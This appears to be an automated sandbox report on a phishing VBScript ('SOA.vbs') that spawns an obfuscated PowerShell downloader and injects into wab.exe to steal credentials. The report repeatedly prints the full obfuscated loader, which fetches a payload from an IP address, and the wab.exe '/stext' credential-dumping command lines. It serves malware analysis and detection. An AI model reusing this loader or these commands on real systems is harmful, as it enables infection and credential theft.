Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF. Jump to behavior
Abnormal high CPU Usage
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 20_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00401806 NtdllDefWindowProc_W, 20_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004018C0 NtdllDefWindowProc_W, 20_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004016FD NtdllDefWindowProc_A, 23_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004017B7 NtdllDefWindowProc_A, 23_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00402CAC NtdllDefWindowProc_A, 24_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00402D66 NtdllDefWindowProc_A, 24_2_00402D66
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAACCBB0F6 2_2_00007FFAACCBB0F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAACCBBEA2 2_2_00007FFAACCBBEA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0300F1F0 14_2_0300F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0300FAC0 14_2_0300FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0300EEA8 14_2_0300EEA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_0300B768 14_2_0300B768
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_2457B5C1 17_2_2457B5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24587194 17_2_24587194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044B040 20_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0043610D 20_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00447310 20_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044A490 20_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040755A 20_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0043C560 20_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044B610 20_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044D6C0 20_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004476F0 20_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044B870 20_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044081D 20_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00414957 20_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004079EE 20_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00407AEB 20_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044AA80 20_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00412AA9 20_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00404B74 20_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00404B03 20_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0044BBD8 20_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00404BE5 20_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00404C76 20_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00415CFE 20_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00416D72 20_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00446D30 20_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00446D8B 20_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00406E8F 20_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00405038 23_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0041208C 23_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004050A9 23_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0040511A 23_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0043C13A 23_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004051AB 23_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00449300 23_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0040D322 23_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0044A4F0 23_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0043A5AB 23_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00413631 23_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00446690 23_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0044A730 23_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004398D8 23_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_004498E0 23_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0044A886 23_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0043DA09 23_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00438D5E 23_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00449ED0 23_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_0041FE83 23_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00430F54 23_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_004050C2 24_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_004014AB 24_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00405133 24_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_004051A4 24_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00401246 24_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_0040CA46 24_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00405235 24_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_004032C8 24_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00401689 24_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00402F60 24_2_00402F60
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: SOA.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi32_7368.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 720, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: powershell.exe, 00000002.00000002.1870759337.0000019E80742000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1870759337.0000019E804B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1716933830.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Sarcophilus (Brassart ' Ulykke$ Abiot,gTeksto lBef eaaoElengefbBi,leduaForbruglBobinen:StikbreCvalu,arhPseudomaBew.ylel Ad,omsyPicud.vbP,lygyneKnoldbra Sexdign magere Hou,emo=Rationa Se.lout$ BondabRKontorleRie anngKlejnmaiRoentgeo Dy,kognEndocriaN nsynolaztecaniExpansisDemonstt Endetai teeplecSchizot[Con.ubs$CentuplRJebatseePe erbfgfe,esnoiFrida eoHomogranK.rtarmaT mpetelOsseousiKlinik,s Rotorst DissekiBasilisc Vizard. BlterncParisonoMispropufolletanincr tot Trad t-Festeri2Unprovi]Interco ')
Source: powershell.exe, 00000002.00000002.1870759337.0000019E804B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Ulykke$ Abiot,gTeksto lBef eaaoElengefbBi,leduaForbruglBobinen:StikbreCvalu,arhPseudomaBew.ylel Ad,omsyPicud.vbP,lygyneKnoldbra Sexdign magere Hou,emo=Rationa Se.lout$ BondabRKontorleRie anngKlejnmaiRoentgeo Dy,kognEndocriaN nsynolaztecaniExpansisDemonstt Endetai teeplecSchizot[Con.ubs$CentuplRJebatseePe erbfgfe,esnoiFrida eoHomogranK.rtarmaT mpetelOsseousiKlinik,s Rotorst DissekiBasilisc Vizard. BlterncParisonoMispropufolletanincr tot Trad t-Festeri2Unprovi]Interco X
Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Ulykke$ Abiot,gTeksto lBef eaaoElengefbBi,leduaForbruglBobinen:StikbreCvalu,arhPseudomaBew.ylel Ad,omsyPicud.vbP,lygyneKnoldbra Sexdign magere Hou,emo=Rationa Se.lout$ BondabRKontorleRie anngKlejnmaiRoentgeo Dy,kognEndocriaN nsynolaztecaniExpansisDemonstt Endetai teeplecSchizot[Con.ubs$CentuplRJebatseePe erbfgfe,esnoiFrida eoHomogranK.rtarmaT mpetelOsseousiKlinik,s Rotorst DissekiBasilisc Vizard. BlterncParisonoMispropufolletanincr tot Trad t-Festeri2Unprovi]Interco
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@22/13@1/3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 20_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 24_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 20_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 20_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 20_2_0040B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Appelmulighed.Bes Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6I
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzzt3u25.jkb.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7368
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wab.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 00000011.00000002.2561134247.00000000249C0000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian"
